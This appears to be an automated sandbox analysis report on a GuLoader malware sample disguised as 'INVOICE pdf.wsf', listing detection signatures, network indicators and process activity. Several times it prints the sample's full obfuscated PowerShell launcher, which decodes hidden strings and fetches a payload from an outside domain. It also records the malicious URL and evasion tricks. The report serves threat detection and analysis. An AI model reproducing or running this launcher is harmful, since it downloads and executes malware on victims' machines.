Windows Analysis Report
INVOICE pdf.wsf

Overview

General Information

Sample name: INVOICE pdf.wsf
Analysis ID: 1428858
MD5: 62a9fb211e083aefa46e2a82cbef11bc
SHA1: f1e75cf66bbaf1ea3535bfe188f11d08dac775c8
SHA256: 7bf66677d4f93167a77e217bcf72899ffdbcd62cb79688fa7e7346ac91a14678
Tags: guloaderwsf
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: INVOICE pdf.wsf ReversingLabs: Detection: 15%
Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: originalconceptsinc.ru.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: originalconceptsinc.ru.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: originalconceptsinc.ru.com
Source: powershell.exe, 0000000A.00000002.4109661918.0000000007669000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.4087877267.000002448B88B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448A404000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448BD8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://originalconceptsinc.ru.com
Source: powershell.exe, 00000007.00000002.4087877267.000002448A1F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbP
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXR
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.4109661918.000000000771E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.4087877267.000002448B1AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_7984.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Sample has a suspicious name (potential lure to open the executable)
Source: INVOICE pdf.wsf Static file information: Suspicious name
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7069
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7069
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7069 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7069 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B89BF52 7_2_00007FFD9B89BF52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B89B1A6 7_2_00007FFD9B89B1A6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04B2F250 10_2_04B2F250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04B2FB20 10_2_04B2FB20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04B2EF08 10_2_04B2EF08
Java / VBScript file with very long strings (likely obfuscated code)
Source: INVOICE pdf.wsf Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_7984.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winWSF@19/6@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Benzidine233.Sjl Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pd5wkpoa.2hz.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7732
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7984
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: INVOICE pdf.wsf ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
